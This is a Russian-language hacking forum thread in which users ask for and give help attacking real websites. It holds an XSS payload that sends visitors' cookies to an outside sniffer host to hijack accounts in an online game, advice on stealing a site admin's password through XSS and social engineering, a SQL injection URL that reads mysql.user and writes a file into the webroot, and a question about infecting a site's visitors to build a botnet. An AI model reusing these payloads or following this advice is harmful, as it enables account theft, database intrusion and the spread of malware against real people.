Сразу к делу. Проблема с XSS ... Вот она: Когда я ввожу XSS ... а ввожу я его в игру travian.ru он меня перемещат на мой сниффер, но я не знаю , как дать ссылку людям(( примерно вот: Сначала ввожу: "> потом no"><script> document.location.href="http://s.netsec.ru/60880.gif?"+encodeURI(document.cookie); </script>< т.е. там speed.travian.ru/allianz.php и всё..а надо чтоб альянс переминовался по "какой нибудь" ссылке... оч прошу - помогите((( Но там пхп ...я в общем то хз ... попробуйте вот тут: speed.travian.ru < зарегистрируйтесь , постройте посольство до 3 ЛВЛа... - создайте альянс \и переминуйте его в поле "ally2" (( Если можно то ответы в 452277469 ! но сюда тоже зайду! Заранее спасибо! ===т.е. мне надо СРАЗУ ссылку сделать , чтобы она переминовала альянс и выходила на линк Подробно обьясню в 452277469 ! TU
to На100ящий Вот ссылка на оч.хорошую статью,посмотри там: https://forum.antichat.ru/thread49775.html
to SQL~In[J]ecTi0n Читал её уже, хорошая статья, но не выходит!!! /etc/passwd могу прочитать, а httpd.conf найти немогу. Подскажите путь...плз
Здравствуйте, прошу прощения за столь глупый вопрос, просто очень нужна помощь. Суть такова, есть сайт на нем я нашел уязвимость XSS, когда вбиваешь в поля логина и пароля, <script>alert('xss')</script> браузер дружелюбнол выкидывает окошечко, всё как надо. Как мне применить эту уязвимость, в своих целях. Мне нужно стыбрить пароль от админки сайта.
m0rf, соц. инженерия. Берешь любой сниффер, перехватываешь запрос авторизации, потом составляешь xss'ку под сниффер вебовый и впариваешь её админу. з.ы. если непонятно написал, стукни в пм или аську - объясню нормально)
Может ли мне кто небудь объяснить что делать с этим: Я понимаю что это версия и названия бызы данных, ну знаю я эти данные но вить пароля у меня нету! зачем эти инекции тогда?и в каких целях их применять?
Подскажите кто нибудь: Система UNIX. В httpd.conf прописано: <VirtualHost *> ServerAdmin [email protected] DocumentRoot /www/htdocs/rail ServerName www.site.com # ServerAlias 10.7.103.250 ServerAlias 10.7.100.4 ErrorLog /var/log/apache/railway.log CustomLog /var/log/apache/railway.log common </VirtualHost> Дальше нужно записать файл в директорию /www/htdocs/rail: www.site.com/index=4&number=1'+union+select+1,2,3,convert(текст+using+cp1251)+from+mysql.user+into+outfile+"\\www\\htdocs\\rail\\1.txt"/* Вроде записалось, проверяем: www.site.com/1.txt и нифига не получилось... Кто скажет почему???
xaker-boss, Раскручиваешь в этом случае значит "достаешь максимум информации". Воспользовать информацией, естественно, можно в любых целях. Начиная от доступа к аккаунтам юзеров на портале(если таковые есть) до заливки шелла. Вся "раскрутка" описана ранее в статьях. Могу лишь привести банальный пример: есть у меня информация типа: например мне этот ресурс интересен. Зная, что это 5 ветка MSSQL, я могу воспользоваться информацией, находящейся в infromation_schema.columns, а именно имена столбцов и полей. Code: 17:booltxt 17:--1:text 18:cities 18:--1:text 19:kvbath 19:--1:text 20:kvdata 20:--1:date 20:--2:user 20:--3:meta 20:--4:type 20:--5:city 20:--6:strt 20:--7:stor 20:--8:high 20:--9:bath 20:--10:flor 20:--11:stat 20:--12:stot 20:--13:skit 20:--14:sliv 20:--15:dstr 20:--16:wall 20:--17:hnum 20:--18:pric 20:--19:tele 20:--20:dscr 20:--21:cnam 20:--22:ctel 20:--23:mail 20:--24:agen 21:kvfloor 21:--1:text 22:kvmeta 22:--1:text 23:kvstate 23:--1:text 24:kvtype 24:--1:text 25:kvtype1rp 25:--1:text 26:kvuser 26:--1:password 27:kvwall 27:--1:text Например меня интересуют данные, касающиеся информации о пользователях: и получаю что хотел. Все чисто для примера.
интересует такой вопрос... вот я имею крупный сервер, посещает его довольно таки много человек... можно ли через этот сайт троянить юзеров??(и как) цель: поднять ботнет сеть.
На100ящий с чего ты взял что рутовые? -=megahertz=- конечно можно,совсем не давно моя ася так и ушла,благодарю того человека который ее вернул.) ps:вот почитай Code: http://forum.antichat.ru/thread58732.html может пригодится.